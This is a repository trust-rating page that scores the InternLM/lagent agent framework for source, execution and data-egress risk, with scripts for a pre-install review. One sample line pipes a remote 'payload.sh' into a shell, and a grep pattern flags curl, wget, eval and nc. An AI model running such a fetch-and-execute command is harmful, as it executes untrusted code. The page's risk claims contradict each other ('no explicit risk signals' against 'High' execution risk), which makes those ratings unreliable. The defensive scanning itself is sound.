Agentic AI Engineering
Repository: agentic-ai-engineering
Author: agenticloops-ai · Source status: Clear source
Hands-on tutorials for building AI agents from scratch.
Score basis: Clear source · Low risk signals · Universal
Repository: lagent
Author: InternLM · Source status: Clear source
A lightweight framework for building LLM-based agents. Topics: agent, gpt, llm, transformers.
Score basis: Clear source · Low risk signals · Universal
Trust level
72 · Review first
Usable, but inspect source, install method, and risk hints before adoption.
Risk decision
No explicit risk signals
No explicit risk signal is available.
Install readiness
script-backed · copy-only command
SkillTrust only shows install guidance and copy actions; it never executes installs.
Before you install
Review source, permissions, and execution risk first, then compare alternatives. Scores prioritize review; they do not replace manual judgment.
Review weakest dimensions and next actions before copying commands.
Evidence or risk signals are incomplete; compare alternatives first.
Audit grade
C · Review first
Execution risk
High
Evidence confidence
65%
SAS-v2.1 radar
SAS-v2.1
Audit grade
C · Review first
Execution risk
High
Top threats
unexpected code execution, data exfiltration
Control gaps
missing license, broad permissions
Evidence confidence
65%
Repository
InternLM/lagent
Author
InternLM
Community signal
2.2K stars · 226 forks
Last updated
2026-04-07
Primary source
InternLM/lagent
Source status
Clear source
Install method
script-backed
Command & code execution
34 · Focus: Whether it runs commands or scripts
Next action: Manually confirm command-running skills in an isolated directory.
High-risk action confirmation
38 · Focus: Whether destructive or external actions require confirmation
Next action: Avoid directly installing high-risk skills without confirmation controls.
Network & data egress
43 · Focus: Whether it may send data out
Next action: If unsure, restrict network access or allow only known domains.
Supported tools can change install steps; Universal entries need source review.
Explicitly supported
Candidate support (inferred)
Candidate tools are inferred signals, not official compatibility certifications.
git clone https://github.com/InternLM/lagent.git
No explicit risk signals recorded
Review source and permissions before copying install commands.
Evidence or risk signals are incomplete; compare alternatives first.
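The "review source and permissions before copying install commands" step above can be sketched as a quick local scan. This is a minimal sketch, not a SkillTrust feature; the temporary directory and sample file are illustrative stand-ins for a cloned repository, and the grep patterns are rough proxies for the flagged threat classes (unexpected code execution, data exfiltration).

```shell
# Minimal pre-install review sketch (illustrative, not part of SkillTrust).
# In practice, clone first: git clone https://github.com/InternLM/lagent.git
repo=$(mktemp -d)

# Stand-in for a repository file that pipes remote content into a shell --
# the kind of pattern behind "unexpected code execution" and "data exfiltration".
printf 'curl -s https://example.com/payload.sh | sh\n' > "$repo/setup.sh"

# Flag common execution/egress patterns before running anything.
grep -RnE 'curl|wget|eval|base64|nc ' "$repo" || echo "no obvious risky patterns"

rm -rf "$repo"
```

A match here is not proof of malice, only a pointer to the lines worth reading by hand before installing.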
Focus: Who published it and whether it is traceable
Next action: Review repository, author, and README first; do not install directly when source is pending.
Focus: Whether install steps can be reviewed
Next action: Prefer candidates with install docs and repository evidence.
Focus: Whether tool descriptions may hide instructions
Next action: Read README, rules, and tool descriptions before install.
Focus: What it can access
Next action: Grant only task-required permissions and prefer Ask/manual confirmation.
Focus: Whether it runs commands or scripts
Next action: Manually confirm command-running skills in an isolated directory.
Focus: Whether file reads/writes can escape scope
Next action: Check working directory and file access scope before running.
Focus: Whether it may send data out
Next action: If unsure, restrict network access or allow only known domains.
Focus: Whether it handles tokens, private keys, or agent identity
Next action: Do not provide long-lived tokens or private keys to source-pending skills.
Focus: Whether external content can steer behavior
Next action: For browser/RAG/rules skills, review permissions and confirmation controls first.
Focus: Whether memory or retrieved context can be poisoned
Next action: Try RAG/memory skills in a low-privilege environment first.
Focus: Whether external tools and MCP access are clearly bounded
Next action: Confirm which external tools it will connect to before install, and start with the smallest possible set.
Focus: Whether destructive or external actions require confirmation
Next action: Avoid directly installing high-risk skills without confirmation controls.
Focus: How far impact can spread when something goes wrong
Next action: If unsure, test in an isolated project first.
Focus: Whether actions can be traced
Next action: Prefer candidates with logs or previews.
Focus: Whether it is maintained and reusable
Next action: Check license and maintenance before organizational use.
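The "missing license" control gap flagged above can be checked mechanically before organizational use. A minimal sketch, assuming a local clone; the temporary directory here is a stand-in for a clone that lacks a license file.

```shell
# Sketch: detect the "missing license" control gap in a cloned repo.
# $repo stands in for a local clone (e.g. of InternLM/lagent).
repo=$(mktemp -d)
touch "$repo/README.md"   # a repo with docs but no LICENSE file

if ls "$repo"/LICENSE* "$repo"/COPYING* >/dev/null 2>&1; then
  echo "license file present"
else
  echo "missing license: review before organizational use"
fi

rm -rf "$repo"
```

A missing file is only a starting point: a license may live in the README or be absent deliberately, so confirm terms with the maintainers before adoption.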
Usable, but inspect source, install method, and risk hints before adoption.
Phase 1 only shows installation-aware, source-backed signals. SkillTrust does not execute install scripts for users.
Risk factors
No explicit risk signals.
Permission hints
repository clone, local runtime dependencies
Why related: Same task category, Keyword overlap, Similar install method
Repository: gram
Author: speakeasy-api · Source status: Clear source
Securely scale AI usage across your organization.
Score basis: Clear source · Low risk signals · Universal
Why related: Same task category, Keyword overlap, Similar install method
Repository: NVIDIA-Nemotron-3-Super
Author: cobusgreyling · Source status: Clear source
Controllable reasoning demos for NVIDIA Nemotron 3 Super (120B/12B MoE): chat UI, CLI, API server, tool calling, budget sweep, and adaptive routing. Topics: gradio, llm, mixture-of-experts, moe, nemotron, nim, nvidia, re
Score basis: Clear source · Low risk signals · Universal
Why related: Same task category, Keyword overlap, Similar install method
Repository: HuixiangDou
Author: InternLM · Source status: Clear source
HuixiangDou: Overcoming Group Chat Scenarios with LLM-based Technical Assistance
Score basis: Clear source · Risk needs review · Universal
Why related: Keyword overlap, Same repository ecosystem, Same author
Repository: OpenAOE
Author: InternLM · Source status: Clear source
LLM Group Chat Framework: chat with multiple LLMs at the same time.
Score basis: Clear source · Risk needs review · Universal
Why related: Keyword overlap, Same repository ecosystem, Same author
Repository: posthog
Author: PostHog · Source status: Clear source
🦔 PostHog is an all-in-one developer platform for building successful products.
Score basis: Clear source · High risk signals · Universal
Why related: Same task category, Keyword overlap, Similar install method
Repository: lmdeploy
Author: InternLM · Source status: Clear source
LMDeploy is a toolkit for compressing, deploying, and serving LLMs.
Score basis: Clear source · Risk needs review · Universal
Repository: HuixiangDou
Author: InternLM · Source status: Clear source
HuixiangDou: Overcoming Group Chat Scenarios with LLM-based Technical Assistance
Score basis: Clear source · Risk needs review · Universal